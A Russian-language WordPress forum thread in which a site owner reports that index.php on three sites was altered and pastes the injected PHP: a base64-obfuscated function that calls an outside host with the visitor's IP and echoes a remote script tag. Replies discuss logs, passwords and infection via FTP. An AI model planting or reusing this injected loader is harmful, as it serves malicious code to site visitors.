• У меня на хостинге три сайта, вчера кто-то зашёл с помощью средств wordpres и обновил index.php в корне трёх сайтов. Один из них на wordpres 3.6 а два 3.5.2
    syntax error, unexpected $end in index.php on line 39 wordpres

    <?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    function sql2_safe($in) {
            $rtn = base64_decode($in);
            return $rtn;
    }
    function collectnewss() {
    
    		if (!isset($_COOKIE["iJijkdaMnerys"])) {
            $value = 'yadeor';
    		$ip = $_SERVER['REMOTE_ADDR'];
            $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
    		$file = @fopen ($get, "r");
    		$content = @fread($file, 1000);
    		@setcookie("iJijkdaMnerys", $value, time()+3600*24);
    		if (!$content)
    			echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9hY2NvdW50dXMuZ2V0cy1pdC5uZXQvZ29vZ2xlc3RhdC5waHAiPjwvc2NyaXB0Pg==);
    		else
    			echo $content;
    
    		}
    }
    collectnewss ();

    Через хостинг не входили, я проверил логи. Через FTP тоже не входили. Один сайт с 3.6 я повторно обновил и всё нормально, сравнил с другими увидел это изменение, файлы сохранил. Думаю обновить сайты 3.5.2 или еще сидеть искать как проникли, мне с ними не горит.

    Может кто чего подскажет, как с этими «вирусами» бороться.

Просмотр 10 ответов — с 1 по 10 (всего 10)
  • Пароли в админку сложные или 123456? Имя admin изменено?

    У WP есть только одна версия — текущая последняя. Соответственно.

    Так а это «на» такое поменяли, или «так уже и было, но сегодня чот вылезла ошибка»?

    Думаю обновить сайты 3.5.2 или еще сидеть искать как проникли, мне с ними не горит.

    Обновляться с заражением? Не продуктивно, имхо. Изучайте логи, обычно домашние хакеры не занимаются зачисткой следов, поэтому, по дате изменения файла можно определить время его активности, а там, как повезет, иногда логи стоят (зависит от хостера) на ротаторе и постоянно перезаписываются.

    Возможно, скачанная тема оформления или плагин из ненадежных источников послужили входной дверью. Часто бывает, что проникают от соседей по хостингу, тоже обратите внимание на этот факт (рейтинг хостера, кстати, кто он?)

    Файл создан 03.09.2013 23:28 я туда не заходил… пароль рабочий

    Есть один злопыхатель, но если бы он пароль узнал зачем бы ему так меня первый файл. Зашёл бы сразу через хостинг испортил бы еще и базу. Возможно он кому-то заплатил, а этот кто-то нашёл пути как испортить файлы. Причём увидел именно все каталоги и внёс изменения именно в эти файлы.

    Я могу представить, что только старую версию уже так изучили, что нашли пути как влезть. Может кинуться обновить два других сайта, даже 3.5.1. и затереть следы.
    (логи wordpres ведёт как посмотреть)

    Так как заражению подверглись разные движки https://www.google.ru/search?q=iJijkdaMnerys , то здесь сложно определить общий фактор. Начинайте проверку со своего компьютера, затем хостер, и потом уязвимости на своих сайтах.


    Вот, подобный случай http://hostcms.pro/tag/HEUR:Trojan.Script.Generic/

    Видел похожее — на лицо вредоносный код для удаленного доступа. Смените пароль, верните файлы до нормального состояния из бекапа. И вообще — разберитесь в проблеме — если вы обновитесь, то это будет полумера.

    логи wordpres ведёт как посмотреть

    Если вы не знаете, как посмотреть логи, уточните у своего хостера. Но во второй указанной ссылке человек описывает конкретный путь заражения.


    Кратко пробежал по сетке, по нескольким версиям скрипта они могут использовать «захваченные» хостинги в качестве увеличения ботнета, возможно заражение посетителей таких сайтов и, следовательно, усиление своих позиций :)).


    Берегите себя и свою информацию 🙂 Засим откланиваюсь.

    Хостер не ведёт логи, вернее их можно включить, но я не парился.

    Я в общем тоже думаю, надо поменять пароль. Я уже поменял.

    Провайдер hostland.ru прислал логи входов по FTP

    Через него заменили файл. WordPress не причём.

    Tue Sep 03 23:37:58 2013 0 37.1.217.121 395 /home/host1263326/okean.name/htdocs/www/index.php a _ o r host1263326 ftp 0 * c
    Tue Sep 03 23:37:58 2013 0 37.1.217.121 1035 /home/host1263326/okean.name/htdocs/www/index.php a _ i r host1263326 ftp 0 * c
    Tue Sep 03 23:38:03 2013 0 37.1.217.121 395 /home/host1263326/intercom.name/htdocs/www/index.php a _ o r host1263326 ftp 0 * c
    Tue Sep 03 23:38:03 2013 0 37.1.217.121 1035 /home/host1263326/intercom.name/htdocs/www/index.php a _ i r host1263326 ftp 0 * c
    Tue Sep 03 23:38:07 2013 0 37.1.217.121 395 /home/host1263326/europeasia.org/htdocs/www/index.php a _ o r host1263326 ftp 0 * c
    Tue Sep 03 23:38:08 2013 0 37.1.217.121 1035 /home/host1263326/europeasia.org/htdocs/www/index.php a _ i r host1263326 ftp 0 * c

    Если, что сети смотреть тут Я посмотрел какая сеть в америке, наверное через прокси для шпионов.
    И вот тут пишут тоже, о том же и про вход по FTP

    Хотел еще написать по борьбе с подобной штукой.

    1. В инете есть конвертеры из base64 в нормальный текст, пожаловался в на сайт создателям FireFox, что бы они блокировали переход к нему.

    2. что бы защитить WordPress на будущее! Из анализа испорченного скрипта и оригинального, я понял, что было просто дописано к корневому php файлу снизу в виде функции, надо сделать так, что бы в неё не возвращался больше интерпретатор php.
    Последний оригинальный вызов:
    require('./wp-blog-header.php');
    Из него не должно быть возврата, в нём выполнение должно завершиться, будущие вирусы не смогут испортить больше мой сайт по этому принципу. Пока не забуду и с новым обновлением….

Просмотр 10 ответов — с 1 по 10 (всего 10)
  • Тема «Как можно проникнуть в файлы и подменить их» закрыта для новых ответов.